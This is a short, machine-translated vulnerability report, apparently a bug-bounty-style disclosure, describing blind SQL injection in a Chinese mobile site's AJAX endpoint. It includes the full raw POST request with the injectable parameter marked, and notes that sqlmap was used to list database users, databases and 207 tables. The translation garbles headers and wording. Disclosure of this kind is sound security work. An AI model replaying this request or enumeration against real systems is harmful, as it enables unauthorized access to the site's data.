APP security-SQL Injection in official Chinese mobile apps
SQL Injection for APP security
Target: Official mobile APP in China
Check that SQL Injection exists in the following places: (data [1] [iid]/data [2] [iid]/data [3] [iid]/data [4] [iid ], boolean blind note/time blind note)
POST http://m.cnmo.com/smart/index.php?c=AjaxDoc&m=HotInfos HTTP/1.1 Host: m. cnmo. comProxy-Connection: keep-aliveReferer: http://m.cnmo.com/smart/529709.htmlContent-Length : 930 Origin: http://m.cnmo.comX-Requested-With : XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept: text/html, application/xhtml + xml, application/xml; q = 0.9 ,*/*; q = 0.8User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; zh-cn; ZTE Grand S Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) version/4.0 Mobile Safari/534.30Accept-Encoding: gzip, deflateAccept-Language: zh-CN, en-USAccept-Charset: UTF-8, iso-8859-1, *; q = 0.7 Cooki E: z_pro_city = s_provice % 3 Dguangdong % 26s_city % 3 Dshenzhen; ip_ck = 7seD7/Shanghai % 3D; lv = 1452095205; vn = 1; Shanghai = 1452095206; Shanghai = 1452095206; tmc = large; tma = 236054355.49836455.1452095205903.1452095205903.1452095205903.1; tmd = 1.236054355.49836455.1452095205 903 .; bfd_s = 236054355.12984014.1452095205883; bfd_g = b207ecf4bbe4943841765f900007e07568d36e8data [0] [iid] = 528621 & data [0] [name] = smart router horizontal evaluation + ease of use is the final Principle & data [1] [iid * & data [1] [name] = is the monitoring data trustable? Popular smart bracelet horizontal Evaluation & data [2] [iid] = 447004 & data [2] [name] = Microsoft will release smart watches + support for multiple systems & data in a few weeks [3] [iid] = 287720 & data [3] [name] = second generation smart watch + Sony SmartWatch + 2 debut & data [4] [iid] = 531218 & data [4] [name] = iPhone + 7 or support for three defenses + 2016 worth looking forward to new machines
1. SQLMap
2. List current database users
3. list all databases
4. list all tables in the current database, with a total of 207
Solution:
Please kindly advise ~